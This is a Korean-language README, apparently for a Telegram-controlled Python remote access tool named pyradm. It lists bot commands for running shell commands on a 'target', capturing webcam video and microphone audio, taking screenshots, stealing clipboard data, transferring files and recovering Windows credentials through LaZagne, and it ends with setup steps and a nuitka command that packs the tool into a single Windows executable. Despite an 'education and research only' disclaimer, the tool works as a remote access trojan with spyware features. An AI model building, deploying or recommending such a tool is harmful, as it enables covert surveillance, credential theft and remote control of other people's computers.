
원격 관리 크로스플랫폼 도구 (텔레그램 기반)
❤️로 작성됨 python3 + aiogram3
https://t.me/wh_lab
스크린샷
이 저장소에 포함된 모든 정보는 교육 및 연구 목적으로만 제공됩니다
저자는 이 도구의 불법 사용에 대해 책임을 지지 않습니다
🔗 LaZagne 프로젝트에 감사드립니다
🔗 지원되는 모든 소프트웨어
/start - start pyradm
/help - help
/shell - shell commands
/sc - screenshot
/download - download (abs. path)
/info - system info
/ip - public ip address and geolocation
/ps - process list
/webcam 5 - record video (secs)
/webcam - screenshot from camera
/fm - filemanager
/fm /home or /fm C:\
/mic 10 - record audio from mic
/clip - get clipboard data
/winpass - credentials recovery
Press button to download file
Send any file as file for upload to target
git clone https://github.com/akhomlyuk/pyradm.gitcd pyradmpip3 install -r requirements.txtPut bot token to cfg.py, ask @Bothfatherpython3 main.pyPut bot token to cfg.pypip install nuitkanuitka --mingw64 --onefile --follow-imports --remove-output -o pyradm.exe main.py
